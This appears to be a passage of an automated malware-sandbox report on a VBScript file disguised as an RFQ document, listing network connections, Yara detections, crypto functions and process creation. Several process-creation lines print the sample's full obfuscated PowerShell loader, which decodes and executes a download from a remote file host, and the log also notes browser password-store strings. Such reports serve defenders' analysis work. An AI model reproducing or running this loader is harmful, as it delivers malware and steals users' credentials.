Source: powershell.exe, 00000003.00000002.1514044704.0000026727854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.0000026729147000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1514044704.000002672916D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000008.00000002.2594642585.00000000239F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000008.00000002.2594642585.00000000239F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/h
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49969 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49974 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49995 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_8036.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7620, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFAAC3DB296 3_2_00007FFAAC3DB296
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFAAC3DC442 3_2_00007FFAAC3DC442
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_02E9F348 6_2_02E9F348
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_02E9FC18 6_2_02E9FC18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_02E9F000 6_2_02E9F000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0734CAF8 6_2_0734CAF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043C146 8_2_0043C146
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043D278 8_2_0043D278
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00435362 8_2_00435362
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043C468 8_2_0043C468
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043C738 8_2_0043C738
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043E988 8_2_0043E988
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043CA08 8_2_0043CA08
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043CCD8 8_2_0043CCD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00433E09 8_2_00433E09
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043CFAA 8_2_0043CFAA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043F961 8_2_0043F961
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043E97A 8_2_0043E97A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_004329EC 8_2_004329EC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_004369A0 8_2_004369A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00433B95 8_2_00433B95
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00439DE0 8_2_00439DE0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00436FC8 8_2_00436FC8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E1E80 8_2_265E1E80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E0B30 8_2_265E0B30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E17A0 8_2_265E17A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E9C70 8_2_265E9C70
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EFC68 8_2_265EFC68
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E9548 8_2_265E9548
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E2968 8_2_265E2968
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EE258 8_2_265EE258
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E1E70 8_2_265E1E70
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EDE00 8_2_265EDE00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EE6B0 8_2_265EE6B0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EE6A9 8_2_265EE6A9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EEF60 8_2_265EEF60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EEB08 8_2_265EEB08
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EEB01 8_2_265EEB01
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E0B20 8_2_265E0B20
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E8B91 8_2_265E8B91
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E178F 8_2_265E178F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EF3B8 8_2_265EF3B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EF3B1 8_2_265EF3B1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E8BA0 8_2_265E8BA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E0040 8_2_265E0040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E5018 8_2_265E5018
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EF810 8_2_265EF810
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E0038 8_2_265E0038
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E5028 8_2_265E5028
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265ED0F8 8_2_265ED0F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265ECCA0 8_2_265ECCA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265ED550 8_2_265ED550
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265ED549 8_2_265ED549
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E9541 8_2_265E9541
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EDDFF 8_2_265EDDFF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265ED9A8 8_2_265ED9A8
Java / VBScript file with very long strings (likely obfuscated code)
Source: #U8a62#U50f9 (RFQ) -RFQ20241010.vbs Initial sample: Strings found which are bigger than 50
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7102
Source: unknown Process created: Commandline size = 7102
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7102 Jump to behavior
Yara signature match
Source: amsi32_8036.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7620, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@8/9@5/5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Kommandocentralens.Qua Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mheptb4p.15a.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8036
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: msiexec.exe, 00000008.00000002.2594642585.0000000023ADD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2594642585.0000000023AE9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2594642585.0000000023A9A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
